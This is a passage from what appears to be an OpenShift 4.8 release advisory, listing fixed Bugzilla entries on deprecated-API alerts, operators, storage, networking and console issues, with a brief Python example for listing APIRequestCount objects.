Console: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1947791 - MCO: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1947793 - DevEx: APIRemovedInNextReleaseInUse info alerts display\n1947794 - OLM: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component does not trigger APIRemovedInNextReleaseInUse alert\n1947795 - Networking: APIRemovedInNextReleaseInUse info alerts display\n1947797 - CVO: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1947798 - Images: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1947800 - Ingress: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger 
APIRemovedInNextReleaseInUse alert\n1947801 - Kube Storage Version Migrator APIRemovedInNextReleaseInUse info alerts display\n1947803 - Openshift Apiserver: APIRemovedInNextReleaseInUse info alerts display\n1947806 - Re-enable h2spec, http/2 and grpc-interop e2e tests in openshift/origin\n1947828 - `download it` link should save pod log in \u003cpod-name\u003e-\u003ccontainer-name\u003e.log format\n1947866 - disk.csi.azure.com.spec.operatorLogLevel is not updated when CSO loglevel  is changed\n1947917 - Egress Firewall does not reliably apply firewall rules\n1947946 - Operator upgrades can delete existing CSV before completion\n1948011 - openshift-controller-manager constantly reporting type \"Upgradeable\" status Unknown\n1948012 - service-ca constantly reporting type \"Upgradeable\" status Unknown\n1948019 - [4.8] Large number of requests to the infrastructure cinder volume service\n1948022 - Some on-prem namespaces missing from must-gather\n1948040 - cluster-etcd-operator: etcd is using deprecated logger\n1948082 - Monitoring should not set Available=False with no reason on updates\n1948137 - CNI DEL not called on node reboot - OCP 4 CRI-O. \n1948232 - DNS operator performs spurious updates in response to API\u0027s defaulting of daemonset\u0027s maxSurge and service\u0027s ipFamilies and ipFamilyPolicy fields\n1948311 - Some jobs failing due to excessive watches: the server has received too many requests and has asked us to try again later\n1948359 - [aws] shared tag was not removed from user provided IAM role\n1948410 - [LSO] Local Storage Operator uses imagePullPolicy as \"Always\"\n1948415 - [vSphere csi driver operator] clustercsidriver.spec.logLevel doesn\u0027t take effective after changing\n1948427 - No action is triggered after click \u0027Continue\u0027 button on \u0027Show community Operator\u0027 windows\n1948431 - TechPreviewNoUpgrade does not enable CSI migration\n1948436 - The outbound traffic was broken intermittently after shutdown one egressIP node\n1948443 - OCP 4.8 nightly still showing v1.20 even after 1.21 merge\n1948471 - [sig-auth][Feature:OpenShiftAuthorization][Serial] authorization  TestAuthorizationResourceAccessReview should succeed [Suite:openshift/conformance/serial]\n1948505 - [vSphere csi driver operator] vmware-vsphere-csi-driver-operator pod restart every 10 minutes\n1948513 - get-resources.sh doesn\u0027t honor the no_proxy settings\n1948524 - \u0027DeploymentUpdated\u0027 Updated Deployment.apps/downloads -n openshift-console because it changed message is printed every minute\n1948546 - VM of worker is in error state when a network has port_security_enabled=False\n1948553 - When setting etcd spec.LogLevel is not propagated to etcd operand\n1948555 - A lot of events \"rpc error: code = DeadlineExceeded desc = context deadline exceeded\" were seen in azure disk csi driver verification test\n1948563 - End-to-End Secure boot deployment fails \"Invalid value for input variable\"\n1948582 - Need ability to specify local gateway mode in CNO config\n1948585 - Need a CI jobs to test local gateway mode with bare metal\n1948592 - [Cluster Network Operator] Missing Egress Router Controller\n1948606 - DNS e2e test fails \"[sig-arch] Only known images used by tests\" because it does not use a known image\n1948610 - External Storage [Driver: disk.csi.azure.com] [Testpattern: Dynamic PV (block volmode)] multiVolume [Slow] should access to two volumes with the same volume mode and retain data across pod recreation on the same node [LinuxOnly]\n1948626 - 
1948628 - ccoctl needs to plan for future (non-AWS) platform support in the CLI
1948634 - upgrades: allow upgrades without version change
1948640 - [Descheduler] operator log reports key failed with: kubedeschedulers.operator.openshift.io "cluster" not found
1948701 - unneeded CCO alert already covered by CVO
1948703 - p&f: probes should not get 429s
1948705 - [assisted operator] SNO deployment fails - ClusterDeployment shows `bootstrap.ign was not found`
1948706 - Cluster Autoscaler Operator manifests missing annotation for ibm-cloud-managed profile
1948708 - cluster-dns-operator includes a deployment with node selector of masters for the IBM cloud managed profile
1948711 - thanos querier and prometheus-adapter should have 2 replicas
1948714 - cluster-image-registry-operator targets master nodes in ibm-cloud-managed-profile
1948716 - cluster-ingress-operator deployment targets master nodes for ibm-cloud-managed profile
1948718 - cluster-network-operator deployment manifest for ibm-cloud-managed profile contains master node selector
1948719 - Machine API components should use 1.21 dependencies
1948721 - cluster-storage-operator deployment targets master nodes for ibm-cloud-managed profile
1948725 - operator lifecycle manager does not include profile annotations for ibm-cloud-managed
1948763 - CVE-2021-23368 nodejs-postcss: Regular expression denial of service during source map parsing
1948771 - ~50% of GCP upgrade jobs in 4.8 failing with "AggregatedAPIDown" alert on packages.coreos.com
1948782 - Stale references to the single-node-production-edge cluster profile
1948787 - secret.StringData shouldn't be used for reads
1948788 - Clicking an empty metrics graph (when there is no data) should still open metrics viewer
1948789 - Clicking on a metrics graph should show request and limits queries as well on the resulting metrics page
1948919 - Need minor update in message on channel modal
1948923 - [aws] installer forces the platform.aws.amiID option to be set, while installing a cluster into GovCloud or C2S region
1948926 - Memory Usage of Dashboard 'Kubernetes / Compute Resources / Pod' contains wrong CPU query
1948936 - [e2e][automation][prow] Prow script points to deleted resource
1948943 - (release-4.8) Limit the number of collected pods in the workloads gatherer
1948953 - Uninitialized cloud provider error when provisioning a cinder volume
1948963 - [RFE] Cluster-api-provider-ovirt should handle hugepages
1948966 - Add the ability to run a gather done by IO via a Kubernetes Job
1948981 - Align dependencies and libraries with latest ironic code
1948998 - style fixes by GoLand and golangci-lint
1948999 - Cannot assign multiple EgressIPs to a namespace using the automatic way.
1949019 - PersistentVolumes page cannot sync project status automatically, which blocks the user from creating a PV
1949022 - Openshift 4 has a zombie problem
1949039 - Wrong env name to get podnetinfo for hugepage in app-netutil
1949041 - vsphere: wrong image names in bundle
1949042 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should pass the http2 tests (on OpenStack)
1949050 - Bump k8s to latest 1.21
1949061 - [assisted operator][nmstate] Continuous attempts to reconcile InstallEnv in the case of invalid NMStateConfig
1949063 - [sig-network] Conntrack should be able to preserve UDP traffic when server pod cycles for a NodePort service
1949075 - Extend openshift/api for Add card customization
1949093 - PatternFly v4.96.2 regression results in a.pf-c-button hover issues
1949096 - Restore private git clone tests
1949099 - network-check-target code cleanup
1949105 - NetworkPolicy ... should enforce ingress policy allowing any port traffic to a server on a specific protocol
1949145 - Move openshift-user-critical priority class to CCO
1949155 - Console doesn't correctly check for favorited or last namespace on load if project picker used
1949180 - Pipelines plugin model kinds aren't picked up by parser
1949202 - sriov-network-operator not available from operatorhub on ppc64le
1949218 - ccoctl not included in container image
1949237 - Bump OVN: Lots of conjunction warnings in ovn-controller container logs
1949277 - operator-marketplace: deployment manifests for ibm-cloud-managed profile have master node selectors
1949294 - [assisted operator] OPENSHIFT_VERSIONS in assisted operator subscription does not propagate
1949306 - need a way to see top API accessors
1949313 - Rename vmware-vsphere-* images to vsphere-* images before 4.8 ships
1949316 - BaremetalHost resource automatedCleaningMode ignored due to outdated vendoring
1949347 - apiserver-watcher support for dual-stack
1949357 - manila-csi-controller pod not running due to lack of secret (in another ns)
1949361 - CoreDNS resolution failure for external hostnames with "A: dns: overflow unpacking uint16"
1949364 - Mention scheduling profiles in scheduler operator repository
1949370 - Testability of: Static pod installer controller deadlocks with non-existing installer pod, WAS: kube-apiserver of cluster operator always with incorrect status due to pleg error
1949384 - Edit Default Pull Secret modal - i18n misses
1949387 - Fix the typo in auto node sizing script
1949404 - label selector on pvc creation page - i18n misses
1949410 - The referred role doesn't exist if creating a rolebinding from the rolebinding tab of the role page
1949411 - VolumeSnapshot, VolumeSnapshotClass and VolumeSnapshotContent Details tab is not translated - i18n misses
1949413 - Automatic boot order setting is done incorrectly when using by-path style device names
1949418 - Controller factory workers should always restart on panic()
1949419 - oauth-apiserver logs "[SHOULD NOT HAPPEN] failed to update managedFields for authentication.k8s.io/v1, Kind=TokenReview: failed to convert new object (authentication.k8s.io/v1, Kind=TokenReview)"
1949420 - [azure csi driver operator] pvc.status.capacity and pv.spec.capacity are not processed the same as in the in-tree plugin
1949435 - ingressclass controller doesn't recreate the openshift-default ingressclass after deleting it
1949480 - Listener timeouts are constantly being updated
1949481 - cluster-samples-operator restarts approximately two times per day and logs too many identical messages
1949509 - Kuryr should manage API LB instead of CNO
1949514 - URL is not visible for routes at narrow screen widths
1949554 - Metrics of vSphere CSI driver sidecars are not collected
1949582 - OCP v4.7 installation with OVN-Kubernetes fails with error "egress bandwidth restriction -1 is not equals"
1949589 - APIRemovedInNextEUSReleaseInUse Alert Missing
1949591 - Alert does not catch removed api usage during end-to-end tests.
1949593 - rename DeprecatedAPIInUse alert to APIRemovedInNextReleaseInUse
1949612 - Install with 1.21 Kubelet is spamming logs with failed to get stats failed command 'du'
1949626 - machine-api fails to create AWS client in new regions
1949661 - Kubelet Workloads Management changes for OCPNODE-529
1949664 - Spurious keepalived liveness probe failures
1949671 - System services such as openvswitch are stopped before pod containers on system shutdown or reboot
1949677 - multus is the first pod on a new node and the last to go ready
1949711 - cvo unable to reconcile deletion of openshift-monitoring namespace
1949721 - Pick 99237: Use the audit ID of a request for better correlation
1949741 - Bump golang version of cluster-machine-approver
1949799 - ingresscontroller should deny the setting when spec.tuningOptions.threadCount exceeds 64
1949810 - OKD 4.7 unable to access Project Topology View
1949818 - Add e2e test to perform MCO operation on Single Node OpenShift
1949820 - Unable to use `oc adm top is` shortcut when asking for `imagestreams`
1949862 - The ccoctl tool sometimes hits a panic when running the delete subcommand
1949866 - The ccoctl fails to create authentication file when running the command `ccoctl aws create-identity-provider` with `--output-dir` parameter
1949880 - adding providerParameters.gcp.clientAccess to existing ingresscontroller doesn't work
1949882 - service-idler build error
1949898 - Backport RP#848 to OCP 4.8
1949907 - Gather summary of PodNetworkConnectivityChecks
1949923 - some defined rootVolumes zones not used on installation
1949928 - Samples Operator updates break CI tests
1949935 - Fix incorrect access review check on start pipeline kebab action
1949956 - kaso: add minreadyseconds to ensure we don't have an LB outage on kas
1949967 - Update Kube dependencies in MCO to 1.21
1949972 - Descheduler metrics: populate build info data and make the metrics entries more readable
1949978 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should pass the h2spec conformance tests [Suite:openshift/conformance/parallel/minimal]
1949990 - (release-4.8) Extend the OLM operator gatherer to include CSV display name
1949991 - openshift-marketplace pods are crashlooping
1950007 - [CI] [UPI] easy_install is not reliable enough to be used in an image
1950026 - [Descheduler] Need better way to handle evicted pod count for removeDuplicate pod strategy
1950047 - CSV deployment template custom annotations are not propagated to deployments
1950112 - SNO: machine-config pool is degraded: error running chcon -R -t var_run_t /run/mco-machine-os-content/os-content-321709791
1950113 - in-cluster operators need an API for additional AWS tags
1950133 - MCO creates empty conditions on the kubeletconfig object
1950159 - Downstream ovn-kubernetes repo should have no linter errors
1950175 - Update Jenkins and agent base image to Go 1.16
1950196 - ssh Key is added even with 'Expose SSH access to this virtual machine' unchecked
1950210 - VPA CRDs use deprecated API version
1950219 - KnativeServing is not shown in list on global config page
1950232 - [Descheduler] - The minKubeVersion should be 1.21
1950236 - Update OKD imagestreams to prefer centos7 images
1950270 - should use "kubernetes.io/os" in the dns/ingresscontroller node selector description when executing oc explain command
1950284 - Tracking bug for NE-563 - support user-defined tags on AWS load balancers
1950341 - NetworkPolicy: allow-from-router policy does not allow access to service when the endpoint publishing strategy is HostNetwork on OpenshiftSDN network
1950379 - oauth-server is in pending/crashbackoff at the beginning of 50% of CI runs
1950384 - [sig-builds][Feature:Builds][sig-devex][Feature:Jenkins][Slow] openshift pipeline build perm failing
1950409 - Descheduler operator code and docs still reference v1beta1
1950417 - The Marketplace Operator is building with EOL k8s versions
1950430 - CVO serves metrics over HTTP, despite a lack of consumers
1950460 - RFE: Change Request Size Input to Number Spinner Input
1950471 - e2e-metal-ipi-ovn-dualstack is failing with etcd unable to bootstrap
1950532 - Include "update" when referring to operator approval and channel
1950543 - Document non-HA behaviors in the MCO (SingleNodeOpenshift)
1950590 - CNO: Too many OVN netFlows collectors causes ovnkube pods CrashLoopBackOff
1950653 - BuildConfig ignores Args
1950761 - Monitoring operator deployments anti-affinity rules prevent their rollout on single-node
1950908 - kube_pod_labels metric does not contain k8s labels
1950912 - [e2e][automation] add devconsole tests
1950916 - [RFE] console page shows error when vm is paused
1950934 - Unnecessary rollouts can happen due to unsorted endpoints
1950935 - Updating cluster-network-operator builder & base images to be consistent with ART
1950978 - the ingressclass cannot be removed even after deleting the related custom ingresscontroller
1951007 - ovn master pod crashed
1951029 - Drainer panics on missing context for node patch
1951034 - (release-4.8) Split up the GatherClusterOperators into smaller parts
1951042 - Panics every few minutes in kubelet logs post-rebase
1951043 - Start Pipeline Modal Parameters should accept empty string defaults
1951058 - [gcp-pd-csi-driver-operator] topology and multipods capabilities are not enabled in e2e tests
1951066 - [IBM][ROKS] Enable volume snapshot controllers on IBM Cloud
1951084 - avoid benign "Path \"/run/secrets/etc-pki-entitlement\" from \"/etc/containers/mounts.conf\" doesn't exist, skipping" messages
1951158 - Egress Router CRD missing Addresses entry
1951169 - Improve API Explorer discoverability from the Console
1951174 - re-pin libvirt to 6.0.0
1951203 - oc adm catalog mirror can generate ICSPs that exceed etcd's size limit
1951209 - RerunOnFailure runStrategy shows wrong VM status (Starting) on Succeeded VMI
1951212 - User/Group details shows unrelated subjects in role bindings tab
1951214 - VM list page crashes when the volume type is sysprep
1951339 - Cluster-version operator does not manage operand container environments when manifest lacks opinions
1951387 - opm index add doesn't respect deprecated bundles
1951412 - Configmap gatherer can fail incorrectly
1951456 - Docs and linting fixes
1951486 - Replace "kubevirt_vmi_network_traffic_bytes_total" with new metrics names
1951505 - Remove deprecated techPreviewUserWorkload field from CMO's configmap
1951558 - Backport Upstream 101093 for Startup Probe Fix
1951585 - enterprise-pod fails to build
1951636 - assisted service operator uses default serviceaccount in operator bundle
1951637 - don't rollout a new kube-apiserver revision on oauth accessTokenInactivityTimeout changes
1951639 - Bootstrap API server unclean shutdown causes reconcile delay
1951646 - Unexpected memory climb while container not in use
1951652 - Add retries to opm index add
1951670 - Error gathering bootstrap log after pivot: The bootstrap machine did not execute the release-image.service systemd unit
1951671 - Excessive writes to ironic Nodes
1951705 - kube-apiserver needs alerts on CPU utilization
1951713 - [OCP-OSP] After changing image in machine object it enters in Failed - Can't find created instance
1951853 - dnses.operator.openshift.io resource's spec.nodePlacement.tolerations godoc incorrectly describes default behavior
1951858 - unexpected text '0' on filter toolbar on RoleBinding tab
1951860 - [4.8] add Intel XXV710 NIC model (1572) support in SR-IOV Operator
1951870 - sriov network resources injector: user defined injection removed existing pod annotations
1951891 - [migration] cannot change ClusterNetwork CIDR during migration
1951952 - [AWS CSI Migration] Metrics for cloudprovider error requests are lost
1952001 - Delegated authentication: reduce the number of watch requests
1952032 - malformatted assets in CMO
1952045 - Mirror nfs-server image used in jenkins-e2e
1952049 - Helm: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert
1952079 - rebase openshift/sdn to kube 1.21
1952111 - Optimize importing from @patternfly/react-tokens
1952174 - DNS operator claims to be done upgrading before it even starts
1952179 - OpenStack Provider Ports UI Underscore Variables
1952187 - Pods stuck in ImagePullBackOff with errors like rpc error: code = Unknown desc = Error committing the finished image: image with ID "SomeLongID" already exists, but uses a different top layer: that ID
1952211 - cascading mounts happening exponentially when deleting openstack-cinder-csi-driver-node pods
1952214 - Console Devfile Import Dev Preview broken
1952238 - Catalog pods don't report termination logs to catalog-operator
1952262 - Need to support external gateway via hybrid overlay
1952266 - etcd operator bumps status.version[name=operator] before operands update
1952268 - etcd operator should not set Degraded=True EtcdMembersDegraded on healthy machine-config node reboots
1952282 - CSR approver races with nodelink controller and does not requeue
1952310 - VM cannot start up if the ssh key is added by another template
1952325 - [e2e][automation] Check support modal in ssh tests and skip template parentSupport
1952333 - openshift/kubernetes vulnerable to CVE-2021-3121
1952358 - Openshift-apiserver CO unavailable in fresh OCP 4.7.5 installations
1952367 - No VM status on overview page when VM is pending
1952368 - worker pool went degraded due to no rpm-ostree on rhel worker during applying new mc
1952372 - VM stop action should not be there if the VM is not running
1952405 - console-operator is not reporting correct Available status
1952448 - Switch from Managed to Disabled mode: no IP removed from configuration and no container metal3-static-ip-manager stopped
1952460 - In k8s 1.21 bump '[sig-network] Firewall rule control plane should not expose well-known ports' test is disabled
1952473 - Monitor pod placement during upgrades
1952487 - Template filter does not work properly
1952495 - "Create" button on the Templates page is confusing
1952527 - [Multus] multi-networkpolicy does wrong filtering
1952545 - Selection issue when inserting YAML snippets
1952585 - Operator links for 'repository' and 'container image' should be clickable in OperatorHub
1952604 - Incorrect port in external loadbalancer config
1952610 - [aws] image-registry panics when the cluster is installed in a new region
1952611 - Tracking bug for OCPCLOUD-1115 - support user-defined tags on AWS EC2 Instances
1952618 - 4.7.4->4.7.8 Upgrade Caused OpenShift-Apiserver Outage
1952625 - Fix translator-reported text issues
1952632 - 4.8 installer should default ClusterVersion channel to stable-4.8
1952635 - Web console displays a blank page - white space instead of cluster information
1952665 - [Multus] multi-networkpolicy pod continues to restart due to OOM (out of memory)
1952666 - Implement Enhancement 741 for Kubelet
1952667 - Update Readme for cluster-baremetal-operator with details about the operator
1952684 - cluster-etcd-operator: metrics controller panics on invalid response from client
1952728 - It was not clear to users why the Snapshot feature was not available
1952730 - "Customize virtual machine" and the "Advanced" feature are confusing in wizard
1952732 - Users did not understand the boot source labels
1952741 - Monitoring DB: after setting Time Range to a custom time range, no data displays
1952744 - PrometheusDuplicateTimestamps with user workload monitoring enabled
1952759 - [RFE] It was not immediately clear what the Star icon meant
1952795 - cloud-network-config-controller CRD does not specify correct plural name
1952819 - failed to configure pod interface: error while waiting on flows for pod: timed out waiting for OVS flows
1952820 - [LSO] Deleting localvolume PV fails
1952832 - [IBM][ROKS] Enable the Web console UI to deploy OCS in External mode on IBM Cloud
1952891 - Upgrade failed due to cinder csi driver not deployed
1952904 - Linting issues in gather/clusterconfig package
1952906 - Unit tests for configobserver.go
1952931 - CI does not check leftover PVs
1952958 - Runtime error loading console in Safari 13
1953019 - [Installer][baremetal][metal3] The baremetal IPI installer fails on delete cluster with: failed to clean baremetal bootstrap storage pool
1953035 - Installer should error out if publish: Internal is set while deploying OCP cluster on any on-prem platform
1953041 - openshift-authentication-operator uses 3.9k% of its requested CPU
1953077 - Handling GCP's: Error 400: Permission accesscontextmanager.accessLevels.list is not valid for this resource
1953102 - kubelet CPU use during an e2e run increased 25% after rebase
1953105 - RHCOS system components registered a 3.5x increase in CPU use over an e2e run before and after 4/9
1953169 - endpoint slice controller doesn't handle services target port correctly
1953257 - Multiple EgressIPs per node for one namespace when "oc get hostsubnet"
1953280 - DaemonSet/node-resolver is not recreated by dns operator after deleting it
1953291 - cluster-etcd-operator: peer cert DNS SAN is populated incorrectly
1953418 - [e2e][automation] Fix vm wizard validate tests
1953518 - thanos-ruler pods failed to start up for "cannot unmarshal DNS message"
1953530 - Fix openshift/sdn unit test flake
1953539 - kube-storage-version-migrator: priorityClassName not set
1953543 - (release-4.8) Add missing sample archive data
1953551 - build failure: unexpected trampoline for shared or dynamic linking
1953555 - GlusterFS tests fail on ipv6 clusters
1953647 - prometheus-adapter should have a PodDisruptionBudget in HA topology
1953670 - ironic container image build failing because esp partition size is too small
1953680 - ipBlock ignoring all other cidrs apart from the last one specified
1953691 - Remove unused mock
1953703 - Inconsistent usage of Tech preview badge in OCS plugin of OCP Console
1953726 - Fix issues related to loading dynamic plugins
1953729 - e2e unidling test is flaking heavily on SNO jobs
1953795 - Ironic can't virtual media attach ISOs sourced from ingress routes
1953798 - GCP e2e (parallel and upgrade) regularly trigger KubeAPIErrorBudgetBurn alert, also happens on AWS
1953803 - [AWS] Installer should do pre-check to ensure user-provided private hosted zone name is valid for OCP cluster
1953810 - Allow use of storage policy in VMC environments
1953830 - The oc-compliance build is not available for OCP4.8
1953846 - SystemMemoryExceedsReservation alert should consider hugepage reservation
1953977 - [4.8] packageserver pods restart many times on the SNO cluster
1953979 - Ironic caching virtualmedia images results in disk space limitations
1954003 - Alerts shouldn't report any alerts in firing or pending state: openstack-cinder-csi-driver-controller-metrics TargetDown
1954025 - Disk errors while scaling up a node with multipathing enabled
1954087 - Unit tests for kube-scheduler-operator
1954095 - Apply user defined tags in AWS Internal Registry
1954105 - TaskRuns Tab in PipelineRun Details Page makes cluster based calls for TaskRuns
1954124 - oc set volume not adding storageclass to pvc which leads to issues using snapshots
1954150 - CVE-2021-23382 nodejs-postcss: ReDoS via getAnnotationURL() and loadAnnotation() in lib/previous-map.js
1954177 - machine-api: admissionReviewVersions v1beta1 is going to be removed in 1.22
1954187 - multus: admissionReviewVersions v1beta1 is going to be removed in 1.22
1954248 - Disable Alertmanager Protractor e2e tests
1954317 - [assisted operator] Environment variables set in the subscription not being inherited by the assisted-service container
1954330 - NetworkPolicy: allow-from-router with label policy-group.network.openshift.io/ingress: "" does not work on an upgraded cluster
1954421 - Get 'Application is not available' when accessing Prometheus UI
1954459 - Error: Gateway Time-out displayed on Alerting console
1954460 - UI, The status of "Used Capacity Breakdown [Pods]" is "Not available"
1954509 - FC volume is marked as unmounted after failed reconstruction
1954540 - Lack of translation for local language on pages under storage menu
1954544 - authn operator: endpoints controller should use the context it creates
1954554 - Add e2e tests for auto node sizing
1954566 - Cannot update a component (`UtilizationCard`) error when switching perspectives manually
1954597 - Default image for GCP does not support ignition V3
1954615 - Undiagnosed panic detected in pod: pods/openshift-cloud-credential-operator_cloud-credential-operator
1954634 - apirequestcounts does not honor max users
1954638 - apirequestcounts should indicate removedinrelease of empty instead of 2.0
1954640 - Support of gatherers with different periods
1954671 - disable volume expansion support in vsphere csi driver storage class
1954687 - localvolumediscovery and localvolumeset e2es are disabled
1954688 - LSO has missing examples for localvolumesets
1954696 - [API-1009] apirequestcounts should indicate useragent
1954715 - Imagestream imports become very slow when doing many in parallel
1954755 - Multus configuration should allow for net-attach-defs referenced in the openshift-multus namespace
1954765 - CCO: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert
1954768 - baremetal-operator: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert
1954770 - Backport upstream fix for Kubelet getting stuck in DiskPressure
1954773 - OVN: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component does not trigger APIRemovedInNextReleaseInUse alert
1954783 - [aws] support byo private hosted zone
1954790 - KCM Alert PodDisruptionBudget At and Limit do not alert with maxUnavailable or MinAvailable by percentage
1954830 - verify-client-go job is failing for release-4.7 branch
1954865 - Add necessary priority class to pod-identity-webhook deployment
1954866 - Add necessary priority class to downloads
1954870 - Add necessary priority class to network components
1954873 - dns server may not be specified for clusters with more than 2 dns servers specified by openstack.
1954891 - Add necessary priority class to pruner
1954892 - Add necessary priority class to ingress-canary
1954931 - (release-4.8) Remove legacy URL anonymization in the ClusterOperator related resources
1954937 - [API-1009] `oc get apirequestcount` shows blank for column REQUESTSINCURRENTHOUR
1954959 - unwanted decorator shown for revisions in topology though it should only be shown for knative services
1954972 - TechPreviewNoUpgrade featureset can be undone
1954973 - "read /proc/pressure/cpu: operation not supported" in node-exporter logs
1954994 - should update to 2.26.0 for prometheus resources label
1955051 - metric "kube_node_status_capacity_cpu_cores" does not exist
1955089 - Support [sig-cli] oc observe works as expected test for IPv6
1955100 - Samples: APIRemovedInNextReleaseInUse info alerts display
1955102 - Add vsphere_node_hw_version_total metric to the collected metrics
1955114 - 4.7-e2e-metal-ipi-ovn-dualstack intermittent test failures, worker hostname is overwritten by NM
1955196 - linuxptp-daemon crash on 4.8
1955226 - operator updates apirequestcount CRD over and over
1955229 - release-openshift-origin-installer-e2e-aws-calico-4.7 is permfailing
1955256 - stop collecting API that no longer exists
1955324 - Kubernetes Autoscaler should use Go 1.16 for testing scripts
1955336 - Failure to Install OpenShift on GCP due to Cluster Name being similar to / contains "google"
1955414 - 4.8 -> 4.7 rollbacks broken on unrecognized flowschema openshift-etcd-operator
1955445 - Drop crio image metrics with high cardinality
1955457 - Drop container_memory_failures_total metric because of high cardinality
1955467 - Disable collection of node_mountstats_nfs metrics in node_exporter
1955474 - [aws-ebs-csi-driver] rebase from version v1.0.0
1955478 - Drop high-cardinality metrics from kube-state-metrics which aren't used
1955517 - Failed to upgrade from 4.6.25 to 4.7.8 due to the machine-config degradation
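Several entries above (bugs 1954634, 1954638, 1954696, 1954937, 1955226) concern the APIRequestCount resource that records which clients still call deprecated APIs and feeds the APIRemovedInNextReleaseInUse alert. As an editorial illustration only, here is a minimal sketch of listing those objects programmatically, assuming the kubernetes Python client's dynamic interface, cluster-admin credentials, and the apiserver.openshift.io/v1 field names; this is the same data `oc get apirequestcount` displays:

    # Sketch: list APIRequestCount objects and flag APIs slated for removal.
    # Assumes the `kubernetes` Python client; field names per apiserver.openshift.io/v1.
    from kubernetes import config, dynamic
    from kubernetes.client import api_client

    config.load_kube_config()
    dyn = dynamic.DynamicClient(api_client.ApiClient())

    counts = dyn.resources.get(
        api_version="apiserver.openshift.io/v1", kind="APIRequestCount"
    )
    for item in counts.get().items:
        # removedInRelease is only set for APIs scheduled for removal.
        release = item.status.removedInRelease if item.status else None
        if release:
            print(f"{item.metadata.name}: removed in release {release}")

The status also carries per-hour request totals and user agents (see bug 1954696), which is what makes it possible to identify the specific offending client rather than just the deprecated API.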
1955548 - [IPI][OSP] OCP 4.6/4.7 IPI with kuryr exceeds defined serviceNetwork range
1955554 - MAO does not react to events triggered from Validating Webhook Configurations
1955589 - thanos-querier should have a PodDisruptionBudget in HA topology
1955595 - Add DevPreviewLongLifecycle Descheduler profile
1955596 - Pods stuck in creation phase on realtime kernel SNO
1955610 - release-openshift-origin-installer-old-rhcos-e2e-aws-4.7 is permfailing
1955622 - 4.8-e2e-metal-assisted jobs: Timeout of 360 seconds expired waiting for Cluster to be in status ['installing', 'error']
1955701 - [4.8] RHCOS boot image bump for RHEL 8.4 Beta
1955749 - OCP branded templates need to be translated
1955761 - packageserver clusteroperator does not set reason or message for Available condition
1955783 - NetworkPolicy: ACL audit log message for allow-from-router policy should also include the namespace to distinguish between two similarly named policies configured in respective namespaces
1955803 - OperatorHub - console accepts any value for "Infrastructure features" annotation
1955822 - CIS Benchmark 5.4.1 Fails on ROKS 4: Prefer using secrets as files over secrets as environment variables
1955854 - Ingress clusteroperator reports Degraded=True/Available=False if any ingresscontroller is degraded or unavailable
1955862 - Local Storage Operator using LocalVolume CR fails to create PVs when backend storage failure is simulated
1955874 - Webscale: sriov vfs are not created and sriovnetworknodestate indicates sync succeeded - state is not correct
1955879 - Customer tags cannot be seen at S3 level when setting spec.managementState from Managed -> Removed -> Managed in configs.imageregistry with high ratio
1955969 - Workers cannot be deployed attached to multiple networks.
1956079 - Installer gather doesn't collect any networking information
1956208 - Installer should validate root volume type
1956220 - Set http proxy system properties as expected by kubernetes-client
1956281 - Disconnected installs are failing with kubelet trying to pull the pause image from the internet
1956334 - Event Listener Details page does not show Triggers section
1956353 - test: analyze job consistently fails
1956372 - openshift-gcp-routes causes disruption during upgrade by stopping before all pods terminate
1956405 - Bump k8s dependencies in cluster resource override admission operator
1956411 - Apply custom tags to AWS EBS volumes
1956480 - [4.8] Bootimage bump tracker
1956606 - probes FlowSchema manifest not included in any cluster profile
1956607 - Multiple manifests lack cluster profile annotations
1956609 - [cluster-machine-approver] CSRs for replacement control plane nodes not approved after restore from backup
1956610 - manage-helm-repos manifest lacks cluster profile annotations
1956611 - OLM CRD schema validation failing against CRs where the value of a string field is a blank string
1956650 - The container disk URL is empty for Windows guest tools
1956768 - aws-ebs-csi-driver-controller-metrics TargetDown
1956826 - buildArgs does not work when the value is taken from a secret
1956895 - Fix chatty kubelet log message
1956898 - fix log files being overwritten on container state loss
1956920 - can't open terminal for pods that have more than one container running
1956959 - ipv6 disconnected sno crd deployment hive reports success status and clusterdeployment reporting false
1956978 - Installer gather doesn't include pod names in filename
1957039 - Physical VIP for pod -> Svc -> Host is incorrectly set to an IP of 169.254.169.2 for Local GW
1957041 - Update CI e2echart with more node info
1957127 - Delegated authentication: reduce the number of watch requests
1957131 - Conformance tests for OpenStack require the Cinder client that is not included in the "tests" image
1957146 - Only run test/extended/router/idle tests on OpenshiftSDN or OVNKubernetes
1957149 - CI: "Managed cluster should start all core operators" fails with: OpenStackCinderDriverStaticResourcesControllerDegraded: "volumesnapshotclass.yaml" (string): missing dynamicClient
1957179 - Incorrect VERSION in node_exporter
1957190 - CI jobs failing due to too many watch requests (prometheus-operator)
1957198 - Misspelled console-operator condition
1957227 - Issue replacing the EnvVariables using the unsupported ConfigMap
1957260 - [4.8] [gcp] Installer is missing new region/zone europe-central2
1957261 - update godoc for new build status image change trigger fields
1957295 - Apply priority classes conventions as test to openshift/origin repo
1957315 - kuryr-controller doesn't indicate being out of quota
1957349 - [Azure] Machine object showing Failed phase even though node is ready and VM is running properly
1957374 - mcddrainerr doesn't list specific pod
1957386 - Config serve and validate command should be under alpha
1957446 - prepare CCO for future without v1beta1 CustomResourceDefinitions
1957502 - Infrequent panic in kube-apiserver in aws-serial job
1957561 - lack of pseudolocalization for some text on Cluster Setting page
